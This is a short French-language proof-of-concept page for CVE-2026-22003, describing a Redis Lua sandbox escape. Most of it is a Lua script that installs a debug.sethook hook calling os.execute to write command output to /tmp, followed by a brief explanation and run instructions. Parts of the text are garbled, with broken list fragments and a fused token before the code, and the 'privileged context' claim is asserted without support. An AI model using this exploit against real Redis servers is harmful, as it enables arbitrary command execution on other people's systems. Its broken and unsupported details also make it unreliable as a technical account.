
Exploit de preuve de concept pour CVE-2026-22003 démontrant une évasion du sandbox Lua de Redis via debug.sethook pour exécuter des commandes système arbitraires.
debug.sethook-- redis_sandbox.lua - Script that attempts sandbox escape
local function escape()
debug.sethook(function()
-- This hook runs in a privileged context
os.execute("id > /tmp/redis_escape")
end, "r")
local a = 1
end
return escape()
La sandbox Lua de Redis ne désactive pas correctement la fonction debug.sethook. Un attaquant capable d'exécuter des scripts Lua peut installer un hook qui s'exécute dans un contexte privilégié et s'échapper de la sandbox pour exécuter des commandes système arbitraires.
os.execute ou des fonctions similaires.EVAL).pip install redis
python trigger_redis_sandbox_escape.py
Le fichier /tmp/redis_escape est créé, ce qui prouve l'exécution de commandes.